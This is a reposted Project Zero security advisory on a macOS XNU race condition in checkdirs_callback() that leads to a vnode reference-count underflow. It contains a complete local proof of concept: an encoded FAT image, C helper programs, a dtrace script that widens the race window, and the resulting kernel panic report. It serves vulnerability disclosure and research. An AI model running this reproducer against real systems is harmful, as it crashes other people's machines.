XNU Missing Locking Race Condition

2019.11.06
Credit: Jann Horn
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-362

XNU: missing locking in checkdirs_callback() enables race with fchdir_common() On macOS, when a new mount point is created, the kernel uses checkdirs() to, as a comment above the function explains: \"Scan all active processes to see if any of them have a current or root directory onto which the new filesystem has just been mounted. If so, replace them with the new mount point.\" In other words, XNU behaves as follows: $ hdiutil attach ./mount_cwd.img -nomount /dev/disk2 $ cd mnt $ ls -l total 0 -rw-r--r-- 1 projectzero staff 0 Aug 6 18:05 underlying $ mount -t msdos -o nobrowse /dev/disk2 . $ ls -l total 0 -rwxrwxrwx 1 projectzero staff 0 Aug 6 18:04 onfat $ (This is different from e.g. Linux, where the cwd would still point to the directory on the root filesystem that is now covered by the mountpoint, and the second \"ls -l\" would show the same output as the first one.) checkdirs() uses proc_iterate() to execute checkdirs_callback() on each running process. checkdirs_callback() is implemented as follows: ====================================================== static int checkdirs_callback(proc_t p, void * arg) { struct cdirargs * cdrp = (struct cdirargs * )arg; vnode_t olddp = cdrp->olddp; vnode_t newdp = cdrp->newdp; struct filedesc *fdp; vnode_t tvp; vnode_t fdp_cvp; vnode_t fdp_rvp; int cdir_changed = 0; int rdir_changed = 0; /* * XXX Also needs to iterate each thread in the process to see if it * XXX is using a per-thread current working directory, and, if so, * XXX update that as well. */ proc_fdlock(p); fdp = p->p_fd; if (fdp == (struct filedesc *)0) { proc_fdunlock(p); return(PROC_RETURNED); } fdp_cvp = fdp->fd_cdir; fdp_rvp = fdp->fd_rdir; proc_fdunlock(p); if (fdp_cvp == olddp) { vnode_ref(newdp); tvp = fdp->fd_cdir; fdp_cvp = newdp; cdir_changed = 1; vnode_rele(tvp); } if (fdp_rvp == olddp) { vnode_ref(newdp); tvp = fdp->fd_rdir; fdp_rvp = newdp; rdir_changed = 1; vnode_rele(tvp); } if (cdir_changed || rdir_changed) { proc_fdlock(p); fdp->fd_cdir = fdp_cvp; fdp->fd_rdir = fdp_rvp; proc_fdunlock(p); } return(PROC_RETURNED); } ====================================================== `p->p_fd` contains the current working directory (`->fd_cdir`) and root directory (`->fd_rdir`) of the process; it is protected against modification by proc_fdlock()/proc_fdunlock(). Because checkdirs_callback() does not hold that lock across the entire operation, several races are possible; for example: - If `fdp->fd_cdir == olddp` is true and `fdp->fd_cdir` changes between the read `tvp = fdp->fd_cdir;` and the second `proc_fdlock(p);`, `vnode_rele(tvp);` will release a nonexistent reference, leading to reference count underflow. - If `fdp->fd_cdir == olddp` is true and the process calls chroot() between the first locked region and the second locked region, a dangling pointer will be written back to `fdp->fd_rdir`. I have written a simple reproducer for the first scenario; however, since the race window is quite narrow, it uses dtrace to make the race easier to hit (so you have to turn off SIP). To prepare an empty FAT32 filesystem and the PoC: ====================================================== Projects-Mac-mini:mount_cwd projectzero$ base64 -D | gunzip > mount_cwd.img H4sIAI3cSV0CA+3TLUsEcRAH4PUQlBMPk2Dyj82yoNmgQZsv4bQIwsrt6XLn7nG75cDgR/BziEls ghiu3rewXTGa1C0GszafZwZm4NcGZrp1e9XrlnE3qaLG7EzUqGv+vRGFaDv6dhOtb40fxgeH4WBn fzfU9nbaG5v1bK0+n17fr71UCyePrae5aLJ0Nn3bfJ0sT1amH+3LrAx150UVknBeFFVy3k9DJyt7 cQhH/TQp05DlZTr8kXf7xWAwCkneWWwOhmlZ1uso9NJRqIpQDevkIsnyEMdxWGxG/Mbx3fvnpzPA P+X/AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+EtfAgGlzAAA EAA= Projects-Mac-mini:mount_cwd projectzero$ Projects-Mac-mini:mount_cwd projectzero$ cat > flipflop2.c #include <fcntl.h> #include <err.h> #include <unistd.h> #include <stdio.h> int main(void) { int outer_fd = open(\".\", O_RDONLY); if (outer_fd == -1) err(1, \"open outer\"); int inner_fd = open(\"mnt\", O_RDONLY); if (inner_fd == -1) err(1, \"open inner\"); while (1) { if (fchdir(inner_fd)) perror(\"chdir 1\"); if (fchdir(outer_fd)) perror(\"chdir 2\"); } } Projects-Mac-mini:mount_cwd projectzero$ cc -o flipflop2 flipflop2.c Projects-Mac-mini:mount_cwd projectzero$ cat > mountloop.c #include <stdlib.h> #include <stdio.h> #include <err.h> int main(int argc, char **argv) { char mount_cmd[1000]; sprintf(mount_cmd, \"mount -t msdos -o nobrowse %s mnt\", argv[1]); while (1) { if (system(mount_cmd) != 0) errx(1, \"mount failed\"); umount:; if (system(\"umount mnt\")) { puts(\"umount failed\"); goto umount; } } } Projects-Mac-mini:mount_cwd projectzero$ cc -o mountloop mountloop.c Projects-Mac-mini:mount_cwd projectzero$ Projects-Mac-mini:mount_cwd projectzero$ cat > test.dtrace #!/usr/sbin/dtrace -w -s __mac_mount:entry { mount_pending = 1; } __mac_mount:return { mount_pending = 0; } proc_iterate:entry { in_proc_iterate = 1; } proc_iterate:return { in_proc_iterate = 0; } vnode_rele_internal:entry { if (mount_pending && in_proc_iterate) { chill(1000*1000*10); } } Projects-Mac-mini:mount_cwd projectzero$ Projects-Mac-mini:mount_cwd projectzero$ chmod +x test.dtrace Projects-Mac-mini:mount_cwd projectzero$ Projects-Mac-mini:mount_cwd projectzero$ mkdir mnt Projects-Mac-mini:mount_cwd projectzero$ ====================================================== In one terminal, launch the dtrace script as root: ====================================================== Projects-Mac-mini:mount_cwd projectzero$ sudo ./test.dtrace dtrace: script './test.dtrace' matched 10 probes dtrace: allowing destructive actions ====================================================== In a second terminal, set up the loop device and launch the ./flipflop2 helper: ====================================================== Projects-Mac-mini:mount_cwd projectzero$ hdiutil attach ./mount_cwd.img -nomount /dev/disk2 Projects-Mac-mini:mount_cwd projectzero$ ./flipflop2 ====================================================== In a third terminal, launch the ./mountloop helper: ====================================================== Projects-Mac-mini:mount_cwd projectzero$ ./mountloop /dev/disk2 umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount' umount failed umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount' umount failed umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount' umount failed [...] ====================================================== (Don't mind the error spew from ./flipflop2 and ./mountloop, that's normal.) Within a few minutes, the system should panic, with an error report like this: ====================================================== *** Panic Report *** panic(cpu 0 caller 0xffffff80055f89c5): \"vnode_rele_ext: vp 0xffffff80276ee458 kusecount(4) out of balance with usecount(3). v_tag = 25, v_type = 2, v_flag = 84800.\"@/BuildRoot/Library/Caches/com.apple.xbs/Sources/xnu/xnu-4903.270.47/bsd/vfs/vfs_subr.c:1937 Backtrace (CPU 0), Frame : Return Address 0xffffff911412b9d0 : 0xffffff80053ad6ed mach_kernel : _handle_debugger_trap + 0x47d 0xffffff911412ba20 : 0xffffff80054e9185 mach_kernel : _kdp_i386_trap + 0x155 0xffffff911412ba60 : 0xffffff80054da8ba mach_kernel : _kernel_trap + 0x50a 0xffffff911412bad0 : 0xffffff800535ab40 mach_kernel : _return_from_trap + 0xe0 0xffffff911412baf0 : 0xffffff80053ad107 mach_kernel : _panic_trap_to_debugger + 0x197 0xffffff911412bc10 : 0xffffff80053acf53 mach_kernel : _panic + 0x63 0xffffff911412bc80 : 0xffffff80055f89c5 mach_kernel : _vnode_rele_internal + 0xf5 0xffffff911412bcc0 : 0xffffff8005607f34 mach_kernel : _dounmount + 0x524 0xffffff911412bd60 : 0xffffff8005607877 mach_kernel : _unmount + 0x197 0xffffff911412bf40 : 0xffffff80059b92ad mach_kernel : _unix_syscall64 + 0x27d 0xffffff911412bfa0 : 0xffffff800535b306 mach_kernel : _hndl_unix_scall64 + 0x16 BSD process name corresponding to current thread: umount Boot args: -zp -v keepsyms=1 Mac OS version: 18G87 Kernel version: Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/RELEASE_X86_64 Kernel UUID: 982F17B3-0252-37FB-9869-88B3B1C77335 Kernel slide: 0x0000000005000000 Kernel text base: 0xffffff8005200000 __HIB text base: 0xffffff8005100000 System model name: Macmini7,1 (Mac-35C5E08120C7EEAF) System uptime in nanoseconds: 390113393507 last loaded kext at 197583647618: com.apple.filesystems.msdosfs 1.10 (addr 0xffffff7f89287000, size 69632) last unloaded kext at 61646619017: com.apple.driver.AppleIntelLpssGspi 3.0.60 (addr 0xffffff7f88208000, size 45056) [...] ====================================================== This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: jannh@google.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top